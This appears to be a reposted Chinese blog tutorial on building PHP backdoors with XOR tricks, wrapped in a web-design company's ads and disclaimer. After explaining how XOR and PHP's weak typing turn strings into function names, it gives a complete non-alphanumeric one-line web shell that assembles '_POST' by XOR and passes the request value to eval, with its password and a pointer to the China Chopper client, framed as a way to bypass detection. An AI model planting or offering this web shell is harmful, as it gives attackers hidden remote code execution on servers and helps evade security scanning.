看這個：

創(chuàng)新互聯(lián)是專業(yè)的梅河口網(wǎng)站建設公司，梅河口接單;提供成都網(wǎng)站建設、網(wǎng)站建設,網(wǎng)頁設計,網(wǎng)站設計,建網(wǎng)站,PHP網(wǎng)站建設等專業(yè)做網(wǎng)站服務;采用PHP框架,可快速的進行梅河口網(wǎng)站開發(fā)網(wǎng)頁制作和功能擴展;專業(yè)做搜索引擎喜愛的網(wǎng)站,專業(yè)的做網(wǎng)站團隊,希望更多企業(yè)前來合作!

<?php  

echo"A"^"}";

?>

   運行這段代碼，那么輸出的結(jié)果是字符"<",之所以會得到這樣的結(jié)果，是因為代碼中對字符"A"和字符"}"進行了異或操作。在PHP中，兩個變量進行異或時，會將字符串轉(zhuǎn)換成二進制再進行異或，異或完，又將結(jié)果從二進制轉(zhuǎn)換成了字符串。異或操作有時也被用來交換兩個變量的值。

   我們都知道，PHP是弱類型的語言，也就是說在PHP中我們可以不預先聲明變量的類型，而直接聲明一個變量并進行初始化或賦值操作。正是由于PHP弱類型的這個特點，我們對PHP的變類型進行隱式的轉(zhuǎn)換，并利用這個特點進行一些非常規(guī)的操作。如將整型轉(zhuǎn)換成字符串型，將布爾型當作整型，或者將字符串當作函數(shù)來處理，下面我們來看一段代碼：

<?php  

$_++;  

$__="<"^"}";  

$__("stuff");

?>

看到這段代碼，大家或許會覺得很疑惑，下面我簡單的來解釋一下：

 (1)$_++;這行代碼的意思是對變量名為"_"的變量進行自增操作，在PHP中未定義的變量默認值為null,null==false==0,我們可以在不使用任何數(shù)字的情況下,通過對未定義變量的自增操作來得到一個數(shù)字。

 (2)$__="<"^"}";對字符"<"和"}"進行異或運算，得到結(jié)果A賦給變量名為"__"(兩個下劃線)的變量

 (3)$__("stuff");通過上面的賦值操作,變量$__的值為A，所以這行可以看作是A("stuff"),在PHP中,這行代碼表示調(diào)用函數(shù)A,但是由于程序中并未定義函數(shù)A，所以這行代碼會拋出一個致命錯誤使程序停止運行。這行代碼沒什么實際的意義，但是它能簡單體現(xiàn)出在PHP中，我們可以將字符串當作函數(shù)來處理。

 文章進行到這里，大家如果再看到類似的PHP后門應該不會那么迷惑了，你可以通過一句句的分析后門代碼來理解后門想實現(xiàn)的功能。如果你依然迷惑，那說明本菜鳥的文章寫的不好，先說聲抱歉了，但是還是希望你別罵我。

 上面的那段示例代碼最后會出錯，導致程序停止運行，當然寫出一個出錯的程序并不是我們的目的，使用這種后門的主要目的是創(chuàng)建一些可以繞過檢測的并且對我們有用的字符串，如_POST", "system", "call_user_func_array"，或者是任何我們需要的東西。

 下面是個非常簡單的非數(shù)字字母的PHP后門：

@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
@eval(${$__}[!$_]);//mima:0

   上菜刀把。

當前題目：php后門－－異或
文章轉(zhuǎn)載：http://aaarwkj.com/article8/iggjop.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供域名注冊、微信小程序、微信公眾號、網(wǎng)頁設計公司、品牌網(wǎng)站制作、網(wǎng)站維護

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)